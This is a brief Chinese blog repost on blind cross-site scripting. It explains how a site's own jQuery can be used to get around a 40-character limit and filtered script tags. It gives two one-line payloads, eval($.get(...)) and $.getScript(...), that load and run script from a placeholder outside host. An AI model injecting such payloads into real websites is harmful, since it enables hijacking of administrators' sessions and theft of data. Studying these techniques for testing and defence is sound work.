后台灰盒+exp被限制40字符+script等标签被过滤。
很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。
于是简短强悍的exp如:
1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现
思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。
大家举一反三吧。
转自:http://evilcos.me/?p=347
ps:总结,当网站使用jQuery时,我们在构造xss代码时可以利用网站的jQuery来构造更简单的xss代码。利用jQuery本质上是利用了jQuery对js中的createElement/appendChild等函数的封装,这样就可以构造更短的xss代码了。
转载请注明:jinglingshu的博客 » jQuery在xss盲打中的作用